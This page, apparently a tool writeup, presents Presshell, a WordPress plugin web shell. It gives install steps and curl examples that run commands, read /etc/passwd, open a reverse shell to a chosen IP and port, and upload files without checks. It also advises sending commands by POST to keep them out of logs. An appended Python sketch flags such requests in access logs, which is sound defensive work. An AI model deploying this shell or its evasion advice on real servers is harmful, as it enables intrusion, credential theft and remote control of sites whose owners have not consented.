
Presshell : Quick And Dirty WordPress Command Execution Shell

Presshell is a quick and dirty WordPress command execution shell: a plugin that executes shell commands on your WordPress server. The uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php

Installation

To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.

Simply upload the zip file located in the Releases section as a new extension and you’re good to go.

Usage

Using the shell is straightforward. Simply pass sh commands as an argument to the shell:

❯ curl 'http://host/…/shell.php?cmd=uname+-a'
Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

You can also pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php

More complex commands are also supported, but be careful with your quoting:

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=cat /etc/passwd | grep -v "(false|nologin)"'
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=python -c "from urllib.parse import urlencode; print(urlencode({\"cmd\": \"uname -a\"}))"'
cmd=uname+-a

You can also open a reverse shell using the ip and port parameters. The default port is 443.

❯ curl 'http://host/…/shell.php' --data-urlencode 'ip=127.0.0.1'

❯ curl 'http://host/…/shell.php' --data-urlencode 'ip=127.0.0.1' --data-urlencode 'port=1337'

There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.

❯ curl 'http://host/…/shell.php' -F 'file=@some_file'
❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php
some_file
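
Because POST bodies do not appear in access logs, the request itself is the only trace the usage above leaves on the web server. The following detection sketch is an added example, not part of Presshell or the original article: it flags direct requests to PHP files under wp-content/plugins that carry the documented cmd, ip or port parameters in the query string, or that are successful POSTs (which also covers the -F upload). It assumes Combined Log Format; the sample lines are constructed, and the POST rule is a heuristic that needs tuning against plugins that legitimately accept direct POSTs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A PHP file requested directly from inside a plugin directory.
PLUGIN_PHP = re.compile(r"^/wp-content/plugins/[^/]+/(?:[^/]+/)*[^/]+\.php$", re.I)
# Parameter names the page documents for the shell.
SHELL_PARAMS = {"cmd", "ip", "port"}

def classify(line):
    """Return a finding dict for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, target, status = m.groups()
    url = urlsplit(target)
    if not PLUGIN_PHP.match(url.path):
        return None
    reasons = []
    hits = SHELL_PARAMS & set(parse_qs(url.query, keep_blank_values=True))
    if hits:
        reasons.append("query parameter " + ",".join(sorted(hits)))
    # POST bodies are not logged, so the request itself is the only signal.
    if method == "POST" and status.startswith("2"):
        reasons.append("successful POST to plugin PHP file")
    if not reasons:
        return None
    return {"client": client, "time": when, "path": url.path, "reasons": reasons}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation-range addresses, hypothetical plugin name).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /wp-content/plugins/shell/shell.php?cmd=uname+-a HTTP/1.1" 200 98 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] "POST /wp-content/plugins/shell/shell.php HTTP/1.1" 200 31 "-" "curl/8.5.0"',
    '198.51.100.4 - - [10/Oct/2024:13:57:11 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2024:13:57:12 +0000] "GET /wp-content/plugins/example-plugin/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
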

R K
